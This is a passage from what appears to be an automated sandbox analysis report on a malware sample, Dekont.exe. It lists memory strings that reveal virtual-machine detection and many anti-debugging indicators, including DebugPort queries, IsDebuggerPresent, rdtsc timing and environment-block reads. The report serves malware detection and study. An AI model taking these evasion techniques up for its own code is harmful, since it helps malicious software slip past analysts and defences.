          Source: explorer.exe, 00000006.00000002.4530151836.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000002.4533709469.0000000009C96000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}-
          Source: explorer.exe, 00000006.00000003.3850951608.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0040ACF0 LdrLoadDll,5_2_0040ACF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_008769F5 IsDebuggerPresent,8_2_008769F5
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107E10E mov eax, dword ptr fs:[00000030h]5_2_0107E10E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107E10E mov ecx, dword ptr fs:[00000030h]5_2_0107E10E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107E10E mov eax, dword ptr fs:[00000030h]5_2_0107E10E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107E10E mov eax, dword ptr fs:[00000030h]5_2_0107E10E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107E10E mov ecx, dword ptr fs:[00000030h]5_2_0107E10E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107E10E mov eax, dword ptr fs:[00000030h]5_2_0107E10E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107E10E mov eax, dword ptr fs:[00000030h]5_2_0107E10E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107E10E mov ecx, dword ptr fs:[00000030h]5_2_0107E10E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107E10E mov eax, dword ptr fs:[00000030h]5_2_0107E10E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107E10E mov ecx, dword ptr fs:[00000030h]5_2_0107E10E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCC0F0 mov eax, dword ptr fs:[00000030h]5_2_00FCC0F0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD80E9 mov eax, dword ptr fs:[00000030h]5_2_00FD80E9
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01090115 mov eax, dword ptr fs:[00000030h]5_2_01090115
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCA0E3 mov ecx, dword ptr fs:[00000030h]5_2_00FCA0E3
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107A118 mov ecx, dword ptr fs:[00000030h]5_2_0107A118
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107A118 mov eax, dword ptr fs:[00000030h]5_2_0107A118
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107A118 mov eax, dword ptr fs:[00000030h]5_2_0107A118
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107A118 mov eax, dword ptr fs:[00000030h]5_2_0107A118
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01000124 mov eax, dword ptr fs:[00000030h]5_2_01000124
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01064144 mov eax, dword ptr fs:[00000030h]5_2_01064144
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01064144 mov eax, dword ptr fs:[00000030h]5_2_01064144
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01064144 mov ecx, dword ptr fs:[00000030h]5_2_01064144
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01064144 mov eax, dword ptr fs:[00000030h]5_2_01064144
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01064144 mov eax, dword ptr fs:[00000030h]5_2_01064144
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01068158 mov eax, dword ptr fs:[00000030h]5_2_01068158
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD208A mov eax, dword ptr fs:[00000030h]5_2_00FD208A
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0108C188 mov eax, dword ptr fs:[00000030h]5_2_0108C188
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0108C188 mov eax, dword ptr fs:[00000030h]5_2_0108C188
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01010185 mov eax, dword ptr fs:[00000030h]5_2_01010185
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01074180 mov eax, dword ptr fs:[00000030h]5_2_01074180
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01074180 mov eax, dword ptr fs:[00000030h]5_2_01074180
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFC073 mov eax, dword ptr fs:[00000030h]5_2_00FFC073
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105019F mov eax, dword ptr fs:[00000030h]5_2_0105019F
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105019F mov eax, dword ptr fs:[00000030h]5_2_0105019F
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105019F mov eax, dword ptr fs:[00000030h]5_2_0105019F
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105019F mov eax, dword ptr fs:[00000030h]5_2_0105019F
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD2050 mov eax, dword ptr fs:[00000030h]5_2_00FD2050
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010961C3 mov eax, dword ptr fs:[00000030h]5_2_010961C3
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010961C3 mov eax, dword ptr fs:[00000030h]5_2_010961C3
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104E1D0 mov eax, dword ptr fs:[00000030h]5_2_0104E1D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104E1D0 mov eax, dword ptr fs:[00000030h]5_2_0104E1D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0104E1D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104E1D0 mov eax, dword ptr fs:[00000030h]5_2_0104E1D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104E1D0 mov eax, dword ptr fs:[00000030h]5_2_0104E1D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCA020 mov eax, dword ptr fs:[00000030h]5_2_00FCA020
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCC020 mov eax, dword ptr fs:[00000030h]5_2_00FCC020
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FEE016 mov eax, dword ptr fs:[00000030h]5_2_00FEE016
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FEE016 mov eax, dword ptr fs:[00000030h]5_2_00FEE016
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FEE016 mov eax, dword ptr fs:[00000030h]5_2_00FEE016
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FEE016 mov eax, dword ptr fs:[00000030h]5_2_00FEE016
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010A61E5 mov eax, dword ptr fs:[00000030h]5_2_010A61E5
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010001F8 mov eax, dword ptr fs:[00000030h]5_2_010001F8
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01054000 mov ecx, dword ptr fs:[00000030h]5_2_01054000
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01072000 mov eax, dword ptr fs:[00000030h]5_2_01072000
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01072000 mov eax, dword ptr fs:[00000030h]5_2_01072000
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01072000 mov eax, dword ptr fs:[00000030h]5_2_01072000
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01072000 mov eax, dword ptr fs:[00000030h]5_2_01072000
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01072000 mov eax, dword ptr fs:[00000030h]5_2_01072000
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01072000 mov eax, dword ptr fs:[00000030h]5_2_01072000
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01072000 mov eax, dword ptr fs:[00000030h]5_2_01072000
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01072000 mov eax, dword ptr fs:[00000030h]5_2_01072000
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01066030 mov eax, dword ptr fs:[00000030h]5_2_01066030
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01056050 mov eax, dword ptr fs:[00000030h]5_2_01056050
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCA197 mov eax, dword ptr fs:[00000030h]5_2_00FCA197
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCA197 mov eax, dword ptr fs:[00000030h]5_2_00FCA197
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCA197 mov eax, dword ptr fs:[00000030h]5_2_00FCA197
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD6154 mov eax, dword ptr fs:[00000030h]5_2_00FD6154
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD6154 mov eax, dword ptr fs:[00000030h]5_2_00FD6154
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCC156 mov eax, dword ptr fs:[00000030h]5_2_00FCC156
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010680A8 mov eax, dword ptr fs:[00000030h]5_2_010680A8
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010960B8 mov eax, dword ptr fs:[00000030h]5_2_010960B8
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010960B8 mov ecx, dword ptr fs:[00000030h]5_2_010960B8
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010520DE mov eax, dword ptr fs:[00000030h]5_2_010520DE
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010560E0 mov eax, dword ptr fs:[00000030h]5_2_010560E0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010120F0 mov ecx, dword ptr fs:[00000030h]5_2_010120F0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100A30B mov eax, dword ptr fs:[00000030h]5_2_0100A30B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100A30B mov eax, dword ptr fs:[00000030h]5_2_0100A30B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100A30B mov eax, dword ptr fs:[00000030h]5_2_0100A30B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE02E1 mov eax, dword ptr fs:[00000030h]5_2_00FE02E1
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE02E1 mov eax, dword ptr fs:[00000030h]5_2_00FE02E1
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE02E1 mov eax, dword ptr fs:[00000030h]5_2_00FE02E1
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]5_2_00FDA2C3
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]5_2_00FDA2C3
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]5_2_00FDA2C3
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]5_2_00FDA2C3
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]5_2_00FDA2C3
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01052349 mov eax, dword ptr fs:[00000030h]5_2_01052349
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01052349 mov eax, dword ptr fs:[00000030h]5_2_01052349
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01052349 mov eax, dword ptr fs:[00000030h]5_2_01052349
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01052349 mov eax, dword ptr fs:[00000030h]5_2_01052349
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01052349 mov eax, dword ptr fs:[00000030h]5_2_01052349
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01052349 mov eax, dword ptr fs:[00000030h]5_2_01052349
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01052349 mov eax, dword ptr fs:[00000030h]5_2_01052349
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01052349 mov eax, dword ptr fs:[00000030h]5_2_01052349
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01052349 mov eax, dword ptr fs:[00000030h]5_2_01052349
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01052349 mov eax, dword ptr fs:[00000030h]5_2_01052349
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01052349 mov eax, dword ptr fs:[00000030h]5_2_01052349
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01052349 mov eax, dword ptr fs:[00000030h]5_2_01052349
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01052349 mov eax, dword ptr fs:[00000030h]5_2_01052349
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01052349 mov eax, dword ptr fs:[00000030h]5_2_01052349
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01052349 mov eax, dword ptr fs:[00000030h]5_2_01052349
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01078350 mov ecx, dword ptr fs:[00000030h]5_2_01078350
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105035C mov eax, dword ptr fs:[00000030h]5_2_0105035C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105035C mov eax, dword ptr fs:[00000030h]5_2_0105035C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105035C mov eax, dword ptr fs:[00000030h]5_2_0105035C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105035C mov ecx, dword ptr fs:[00000030h]5_2_0105035C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105035C mov eax, dword ptr fs:[00000030h]5_2_0105035C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105035C mov eax, dword ptr fs:[00000030h]5_2_0105035C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109A352 mov eax, dword ptr fs:[00000030h]5_2_0109A352
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE02A0 mov eax, dword ptr fs:[00000030h]5_2_00FE02A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE02A0 mov eax, dword ptr fs:[00000030h]5_2_00FE02A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107437C mov eax, dword ptr fs:[00000030h]5_2_0107437C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FC826B mov eax, dword ptr fs:[00000030h]5_2_00FC826B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD4260 mov eax, dword ptr fs:[00000030h]5_2_00FD4260
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD4260 mov eax, dword ptr fs:[00000030h]5_2_00FD4260
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD4260 mov eax, dword ptr fs:[00000030h]5_2_00FD4260
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD6259 mov eax, dword ptr fs:[00000030h]5_2_00FD6259
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCA250 mov eax, dword ptr fs:[00000030h]5_2_00FCA250
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0108C3CD mov eax, dword ptr fs:[00000030h]5_2_0108C3CD
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010563C0 mov eax, dword ptr fs:[00000030h]5_2_010563C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FC823B mov eax, dword ptr fs:[00000030h]5_2_00FC823B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010743D4 mov eax, dword ptr fs:[00000030h]5_2_010743D4
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010743D4 mov eax, dword ptr fs:[00000030h]5_2_010743D4
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107E3DB mov eax, dword ptr fs:[00000030h]5_2_0107E3DB
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107E3DB mov eax, dword ptr fs:[00000030h]5_2_0107E3DB
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107E3DB mov ecx, dword ptr fs:[00000030h]5_2_0107E3DB
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107E3DB mov eax, dword ptr fs:[00000030h]5_2_0107E3DB
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010063FF mov eax, dword ptr fs:[00000030h]5_2_010063FF
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FEE3F0 mov eax, dword ptr fs:[00000030h]5_2_00FEE3F0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FEE3F0 mov eax, dword ptr fs:[00000030h]5_2_00FEE3F0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FEE3F0 mov eax, dword ptr fs:[00000030h]5_2_00FEE3F0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE03E9 mov eax, dword ptr fs:[00000030h]5_2_00FE03E9
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE03E9 mov eax, dword ptr fs:[00000030h]5_2_00FE03E9
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE03E9 mov eax, dword ptr fs:[00000030h]5_2_00FE03E9
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE03E9 mov eax, dword ptr fs:[00000030h]5_2_00FE03E9
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE03E9 mov eax, dword ptr fs:[00000030h]5_2_00FE03E9
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE03E9 mov eax, dword ptr fs:[00000030h]5_2_00FE03E9
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE03E9 mov eax, dword ptr fs:[00000030h]5_2_00FE03E9
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE03E9 mov eax, dword ptr fs:[00000030h]5_2_00FE03E9
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD83C0 mov eax, dword ptr fs:[00000030h]5_2_00FD83C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD83C0 mov eax, dword ptr fs:[00000030h]5_2_00FD83C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD83C0 mov eax, dword ptr fs:[00000030h]5_2_00FD83C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD83C0 mov eax, dword ptr fs:[00000030h]5_2_00FD83C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]5_2_00FDA3C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]5_2_00FDA3C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]5_2_00FDA3C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]5_2_00FDA3C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]5_2_00FDA3C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]5_2_00FDA3C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01058243 mov eax, dword ptr fs:[00000030h]5_2_01058243
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01058243 mov ecx, dword ptr fs:[00000030h]5_2_01058243
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FC8397 mov eax, dword ptr fs:[00000030h]5_2_00FC8397
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FC8397 mov eax, dword ptr fs:[00000030h]5_2_00FC8397
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FC8397 mov eax, dword ptr fs:[00000030h]5_2_00FC8397
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF438F mov eax, dword ptr fs:[00000030h]5_2_00FF438F
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF438F mov eax, dword ptr fs:[00000030h]5_2_00FF438F
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCE388 mov eax, dword ptr fs:[00000030h]5_2_00FCE388
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCE388 mov eax, dword ptr fs:[00000030h]5_2_00FCE388
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCE388 mov eax, dword ptr fs:[00000030h]5_2_00FCE388
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E284 mov eax, dword ptr fs:[00000030h]5_2_0100E284
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E284 mov eax, dword ptr fs:[00000030h]5_2_0100E284
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01050283 mov eax, dword ptr fs:[00000030h]5_2_01050283
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01050283 mov eax, dword ptr fs:[00000030h]5_2_01050283
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01050283 mov eax, dword ptr fs:[00000030h]5_2_01050283
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010662A0 mov eax, dword ptr fs:[00000030h]5_2_010662A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010662A0 mov ecx, dword ptr fs:[00000030h]5_2_010662A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010662A0 mov eax, dword ptr fs:[00000030h]5_2_010662A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010662A0 mov eax, dword ptr fs:[00000030h]5_2_010662A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010662A0 mov eax, dword ptr fs:[00000030h]5_2_010662A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010662A0 mov eax, dword ptr fs:[00000030h]5_2_010662A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCC310 mov ecx, dword ptr fs:[00000030h]5_2_00FCC310
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF0310 mov ecx, dword ptr fs:[00000030h]5_2_00FF0310
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01066500 mov eax, dword ptr fs:[00000030h]5_2_01066500
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010A4500 mov eax, dword ptr fs:[00000030h]5_2_010A4500
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010A4500 mov eax, dword ptr fs:[00000030h]5_2_010A4500
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010A4500 mov eax, dword ptr fs:[00000030h]5_2_010A4500
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010A4500 mov eax, dword ptr fs:[00000030h]5_2_010A4500
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010A4500 mov eax, dword ptr fs:[00000030h]5_2_010A4500
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010A4500 mov eax, dword ptr fs:[00000030h]5_2_010A4500
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010A4500 mov eax, dword ptr fs:[00000030h]5_2_010A4500
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD04E5 mov ecx, dword ptr fs:[00000030h]5_2_00FD04E5
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD64AB mov eax, dword ptr fs:[00000030h]5_2_00FD64AB
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100656A mov eax, dword ptr fs:[00000030h]5_2_0100656A
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100656A mov eax, dword ptr fs:[00000030h]5_2_0100656A
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100656A mov eax, dword ptr fs:[00000030h]5_2_0100656A
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01004588 mov eax, dword ptr fs:[00000030h]5_2_01004588
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFA470 mov eax, dword ptr fs:[00000030h]5_2_00FFA470
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFA470 mov eax, dword ptr fs:[00000030h]5_2_00FFA470
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFA470 mov eax, dword ptr fs:[00000030h]5_2_00FFA470
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E59C mov eax, dword ptr fs:[00000030h]5_2_0100E59C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FC645D mov eax, dword ptr fs:[00000030h]5_2_00FC645D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010505A7 mov eax, dword ptr fs:[00000030h]5_2_010505A7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010505A7 mov eax, dword ptr fs:[00000030h]5_2_010505A7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010505A7 mov eax, dword ptr fs:[00000030h]5_2_010505A7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF245A mov eax, dword ptr fs:[00000030h]5_2_00FF245A
